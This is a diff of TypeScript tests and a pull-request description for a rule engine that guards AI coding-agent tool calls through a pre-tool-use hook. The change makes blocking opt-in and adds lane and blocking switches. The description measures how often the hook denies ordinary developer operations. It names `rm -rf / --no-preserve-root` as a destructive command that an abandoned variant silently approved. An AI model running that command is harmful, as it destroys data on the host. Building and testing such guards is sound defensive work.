+        ['tsx', CLI, 'guard', '--rules', join(dir, 'rules'), ...args],
+        {
+          encoding: 'utf8',
+          timeout: 120_000,
+          input: JSON.stringify({
+            hook: 'PreToolUse',
+            tool_name: 'Read',
+            tool_input: { content: MARKER },
+          }) + '\n',
+          env: { ...process.env, ...env },
+        }
+      );
+      const lines = (r.stdout ?? '')
+        .split('\n')
+        .filter((l) => l.trim().startsWith('{'))
+        .map((l) => JSON.parse(l) as Record<string, unknown>);
+      return { status: r.status ?? -1, lines, stderr: r.stderr ?? '' };
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  }
+
+  const hso = (line: Record<string, unknown>) =>
+    line['hookSpecificOutput'] as Record<string, unknown>;
+
+  it('is advisory by default: detection reported, no permissionDecision', () => {
+    const { status, lines, stderr } = runGuard([]);
+    expect(status, stderr).toBe(0);
+    expect(lines).toHaveLength(1);
+    // CONTROL: the fixture rule must have matched, or "no decision" would be
+    // trivially true because nothing was detected.
+    expect(lines[0]!['matched_rules']).toEqual(['ATR-2026-09102']);
+    expect(lines[0]!['atr_decision']).toBe('deny');
+    expect(hso(lines[0]!)['permissionDecision']).toBeUndefined();
+    expect(stderr).toContain('blocking=off');
+  });
+
+  it('--blocking turns the decision on', () => {
+    const { status, lines, stderr } = runGuard(['--blocking']);
+    expect(status, stderr).toBe(0);
+    expect(lines[0]!['matched_rules']).toEqual(['ATR-2026-09102']);
+    expect(hso(lines[0]!)['permissionDecision']).toBe('deny');
+    expect(stderr).toContain('blocking=on');
+  });
+
+  it('ATR_BLOCKING turns it on without a flag', () => {
+    const { status, lines } = runGuard([], { ATR_BLOCKING: '1' });
+    expect(status).toBe(0);
+    expect(hso(lines[0]!)['permissionDecision']).toBe('deny');
+  });
+
+  it('--no-blocking beats ATR_BLOCKING', () => {
+    const { status, lines } = runGuard(['--no-blocking'], { ATR_BLOCKING: '1' });
+    expect(status).toBe(0);
+    expect(hso(lines[0]!)['permissionDecision']).toBeUndefined();
+    expect(lines[0]!['matched_rules']).toEqual(['ATR-2026-09102']);
+  });
+
+  it('--lane enforce keeps a maturity=test rule from firing at all', () => {
+    const { status, lines, stderr } = runGuard(['--lane', 'enforce', '--blocking']);
+    expect(status, stderr).toBe(0);
+    expect(lines[0]!['matched_rules']).toBeUndefined();
+    expect(hso(lines[0]!)['permissionDecision']).toBe('allow');
+    expect(stderr).toContain('lane=enforce');
+  });
+
+  it('ATR_LANE does the same, and --lane overrides it', () => {
+    const viaEnv = runGuard(['--blocking'], { ATR_LANE: 'enforce' });
+    expect(viaEnv.stderr).toContain('lane=enforce');
+    expect(viaEnv.lines[0]!['matched_rules']).toBeUndefined();
+
+    const flagWins = runGuard(['--lane', 'hunt', '--blocking'], { ATR_LANE: 'enforce' });
+    expect(flagWins.stderr).toContain('lane=hunt');
+    expect(flagWins.lines[0]!['matched_rules']).toEqual(['ATR-2026-09102']);
+  });
+
+  it('rejects a misspelled lane instead of quietly running in hunt', () => {
+    const { status, stderr } = runGuard(['--lane', 'enfroce']);
+    expect(status).toBe(1);
+    expect(stderr + '').toContain('Invalid --lane');
+  });
+
+  it('rejects contradictory blocking flags', () => {
+    const { status, stderr } = runGuard(['--blocking', '--no-blocking']);
+    expect(status).toBe(1);
+    expect(stderr).toContain('mutually exclusive');
+  });
+});

--- a/tests/enforcement.test.ts
+++ b/tests/enforcement.test.ts
@@ -269,10 +269,12 @@ describe('hook contract omits the decision when blocking is off', () => {
   it('emits NO permissionDecision by default, for every outcome', () => {
     for (const decision of ['allow', 'ask', 'deny'] as const) {
       const p = toClaudeCodePreToolUse(hookOutput({ decision, reason: `r-${decision}` }));
-      const hso = p['hookSpecificOutput'] as Record<string, unknown>;
-      expect(hso['hookEventName']).toBe('PreToolUse');
-      expect('permissionDecision' in hso).toBe(false);
-      expect(hso['permissionDecision']).toBeUndefined();
+      // The whole hookSpecificOutput envelope is dropped: a partial one is not
+      // a shape this contract is known to accept, extra top-level atr_* keys
+      // demonstrably are.
+      expect(p['hookSpecificOutput']).toBeUndefined();
+      expect(p['atr_hook_event']).toBe('PreToolUse');
+      expect(JSON.stringify(p)).not.toContain('permissionDecision');
     }
   });
 
@@ -462,8 +464,8 @@ describe('HookHandler carries the policy', () => {
     expect(out.matched_rules).toContain('ATR-2026-09101');
 
     const payload = toClaudeCodePreToolUse(out, { blocking: handler.isBlocking() });
-    expect((payload['hookSpecificOutput'] as Record<string, unknown>)['permissionDecision'])
-      .toBeUndefined();
+    expect(payload['hookSpecificOutput']).toBeUndefined();
+    expect(JSON.stringify(payload)).not.toContain('permissionDecision');
   });
 
   it('picks blocking up from ATR_BLOCKING', async () => {
@@ -582,7 +584,7 @@ test_cases:
   }
 
   const hso = (line: Record<string, unknown>) =>
-    line['hookSpecificOutput'] as Record<string, unknown>;
+    (line['hookSpecificOutput'] ?? {}) as Record<string, unknown>;
 
   it('is advisory by default: detection reported, no permissionDecision', () => {
     const { status, lines, stderr } = runGuard([]);
@@ -592,6 +594,7 @@ test_cases:
     // trivially true because nothing was detected.
     expect(lines[0]!['matched_rules']).toEqual(['ATR-2026-09102']);
     expect(lines[0]!['atr_decision']).toBe('deny');
+    expect(lines[0]!['hookSpecificOutput']).toBeUndefined();
     expect(hso(lines[0]!)['permissionDecision']).toBeUndefined();
     expect(stderr).toContain('blocking=off');
   });

--- a/tests/enforcement.test.ts
+++ b/tests/enforcement.test.ts
@@ -35,6 +35,9 @@ import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
 import {
+  resolveLaneOrWarn,
+  resolveBlockingOrWarn,
+  resetEnforcementWarnings,
   DEFAULT_BLOCKING,
   DEFAULT_LANE,
   isEnforcementAction,
@@ -247,9 +250,37 @@ describe('lane has a real entrance', () => {
     expect(engine.getLane()).toBe('enforce');
   });
 
-  it('rejects an invalid ATR_LANE at construction, before any evaluation', () => {
+  // This expectation was the reverse until review measured what it costs.
+  // Throwing here meant `ATR_BLOCKING=enabled npx atr guard` exited 1 with an
+  // empty stdout and no guard at all, and a typo'd ATR_LANE in a shell profile
+  // crashed the VS Code extension from this constructor. Neither of those
+  // processes asked to read the environment; the environment is ambient.
+  //
+  // So the constructor warns and falls back, and the throwing resolver stays
+  // for an explicit argument, which is the caller's own bug. The warning is the
+  // part that matters -- a silent fallback here would be the failure the
+  // throwing version existed to prevent.
+  it('an invalid ATR_LANE warns and falls back rather than crashing the caller', () => {
     process.env['ATR_LANE'] = 'enfroce';
-    expect(() => new ATREngine({ rules: [fixtureRule()] })).toThrow(/ATR_LANE/);
+    const seen: string[] = [];
+    const write = process.stderr.write;
+    (process.stderr as { write: unknown }).write = (chunk: string) => {
+      seen.push(String(chunk));
+      return true;
+    };
+    try {
+      const engine = new ATREngine({ rules: [fixtureRule()] });
+      expect(engine.getLane()).toBe('hunt');
+    } finally {
+      (process.stderr as { write: unknown }).write = write;
+    }
+    expect(seen.join('')).toMatch(/ATR_LANE/);
+  });
+
+  it('an explicit invalid lane still throws', () => {
+    expect(() => new ATREngine({ rules: [fixtureRule()], lane: 'enfroce' as never })).toThrow(
+      /lane/i,
+    );
   });
 
   it('actually gates firing: a maturity=test rule fires in hunt, not in enforce', async () => {
@@ -648,5 +679,74 @@ test_cases:
     const { status, stderr } = runGuard(['--blocking', '--no-blocking']);
     expect(status).toBe(1);
     expect(stderr).toContain('mutually exclusive');
+  });
+});
+
+describe('ambient environment must not crash a library constructor', () => {
+  // A stray ATR_BLOCKING=enabled used to exit the guard with status 1 and an
+  // empty stdout -- landing hardest on the operator who was trying to turn
+  // enforcement ON. A typo'd ATR_LANE crashed the VS Code extension from the
+  // ATREngine constructor. Neither process asked to read the environment.
+  //
+  // The throwing resolvers stay for explicit arguments, which are the caller's
+  // own bug. The OrWarn wrappers exist for the ambient case: loud on stderr,
+  // safe default, process survives. Loud is what keeps this from being the
+  // silent fallback the throwing version exists to prevent.
+  beforeEach(() => resetEnforcementWarnings());
+
+  it('an unparseable ATR_LANE warns and falls back instead of throwing', () => {
+    const seen: string[] = [];
+    const write = process.stderr.write;
+    (process.stderr as { write: unknown }).write = (chunk: string) => {
+      seen.push(String(chunk));
+      return true;
+    };
+    try {
+      expect(resolveLaneOrWarn(undefined, { ATR_LANE: 'enfroce' })).toBe('hunt');
+    } finally {
+      (process.stderr as { write: unknown }).write = write;
+    }
+    expect(seen.join('')).toContain('enfroce');
+  });
+
+  it('an unparseable ATR_BLOCKING warns and falls back to off', () => {
+    const seen: string[] = [];
+    const write = process.stderr.write;
+    (process.stderr as { write: unknown }).write = (chunk: string) => {
+      seen.push(String(chunk));
+      return true;
+    };
+    try {
+      expect(resolveBlockingOrWarn(undefined, { ATR_BLOCKING: 'enabled' })).toBe(false);
+    } finally {
+      (process.stderr as { write: unknown }).write = write;
+    }
+    // The operator asked for enforcement and is not getting it. Say so.
+    expect(seen.join('')).toContain('NOT enabled');
+  });
+
+  it('an explicit bad argument still throws -- that is the caller, not the shell', () => {
+    expect(() => resolveLaneOrWarn('enfroce')).toThrow(TypeError);
+  });
+
+  it('constructing an engine under a typo\'d ATR_LANE does not throw', () => {
+    expect(() => new ATREngine({ rulesDir: 'rules' })).not.toThrow();
+  });
+
+  it('the warning is emitted once per distinct value, not per call', () => {
+    let calls = 0;
+    const write = process.stderr.write;
+    (process.stderr as { write: unknown }).write = () => {
+      calls += 1;
+      return true;
+    };
+    try {
+      for (let i = 0; i < 5; i += 1) {
+        resolveBlockingOrWarn(undefined, { ATR_BLOCKING: 'enabled' });
+      }
+    } finally {
+      (process.stderr as { write: unknown }).write = write;
+    }
+    expect(calls).toBe(1);
   });
 });


### PR DESCRIPTION
Measured on main: ATR blocks by default, in two channels, and neither is
reachable by an operator who wants to turn it off.

    Bash{command:"ls -la"}
      permissionDecision = allow
      adapter really called  blockTool + alert
      matched = [ATR-2026-00099]

24 ordinary developer operations were run through the shipped path with a
recording adapter that logs the methods actually invoked on the PlatformAdapter
rather than the declared verdict.actions. 21 of them are in that state: one
channel says allow, the other calls blockTool.

The lane system is not the problem. It works -- lane=enforce genuinely admits
only stable rules, verified end to end. It has no switch. Shipped code sets a
lane in zero places, and there is no CLI flag, environment variable, action.yml
input or MCP parameter that can set one, so the hunt default is the only
reachable configuration. In hunt every rule fires, and every `severity:
critical` rule then denies: 271 active rules, of which 228 are not stable.

The project already documents the intended behaviour in three places, and the
code is the opposite of all three. README described the default lane as
advisory; QUALITY-STANDARD restricted blocking to stable rules with confidence
at or above 80; atr-method-v1.1 §5.6 says an engine should not auto-block on a
hash match without operator policy. The engine-wide requirement is SPEC.md §5.5:
"Engines MUST NOT execute response actions automatically without an explicit
configuration directive from the operator." Until this branch there was no way
for an operator to give that directive.

WHAT CHANGES

`src/enforcement.ts` is the single policy resolution point: lane and blocking,
explicit config > environment > default. Lane gains a real entrance (`--lane`,
`ATR_LANE`, action.yml input, existing config key now threaded through).
Blocking gains an explicit switch (`--blocking` / `--no-blocking`,
`ATR_BLOCKING`), default off.

With blocking off, the hook contract omits `permissionDecision` entirely and
ActionExecutor refuses to dispatch anything above the `observe` blast-radius
tier, using the ladder already defined in `src/quality/action-eligibility.ts`
rather than a second one invented here.

The decision is omitted, not downgraded to `allow`. In the PreToolUse contract
`allow` is affirmative approval that suppresses the host's own prompt, so
emitting it would make a hooked session less safe than an unhooked one. A
previous candidate did downgrade to `allow`, and measurably turned
`rm -rf / --no-preserve-root` from a prompt into a silent approval. That branch
was abandoned. Review confirmed the omission semantics against the shipped
Claude Code 2.1.76 hook contract: `permissionDecision` is optional in the schema,
the consumer only enters its switch when the field is present, and the
documentation states that staying silent does not approve the call.

MEASURED

Recording adapter, shipped path, same script run in each tree:

    destructive adapter calls   main 1149 -> default 0 -> --blocking 1149
    observational (alert /
      escalate / snapshot)      identical in all three modes
    permissionDecision present  3985 -> 0 -> 3985
    permissionDecision "allow"  0 in advisory mode (the field is absent)
    detection fields            0 diffs across 3985 events
    main vs --blocking          cmp exit 0, byte identical

The observational counts being identical is the load-bearing control: it proves
the executor still reaches the adapter, so "destructive 0" is suppression rather
than a harness that never ran. Nine deliberate mutations were each confirmed to
turn the suite red.

Independent review reproduced all of it with its own adapter, its own 69
samples, and its own nine mutations, and separately verified the hook contract
from the installed binary.

SCOPE LIMIT

This covers the two channels the engine drives. It does not cover the framework
adapters, which read their own severity floor and still block out of the box:
mastra defaults `blockSeverities` to critical and high, openshell-filter and
nemoclaw-preflight default `ATR_MIN_SEVERITY` to high. Bringing those under the
same switch is a separate decision and is not made here.

BREAKING

Two externally visible defaults flip, so this is a major. `package.json` is
untouched; the release decision is not made in this PR. CHANGELOG carries the
full list, including that an unrecognised `ATR_LANE` now throws where main
ignored the variable entirely.

Do not merge before the downstream compatibility audit lands. The first attempt
at it was rejected in review -- its control constructed `ActionExecutor` with a
positional argument instead of the config object, so `this.adapter` was
undefined, every dispatch threw into a swallowing catch, and the results array
was still length 4 with identical action names. It proved nothing about who
actually consumes which channel.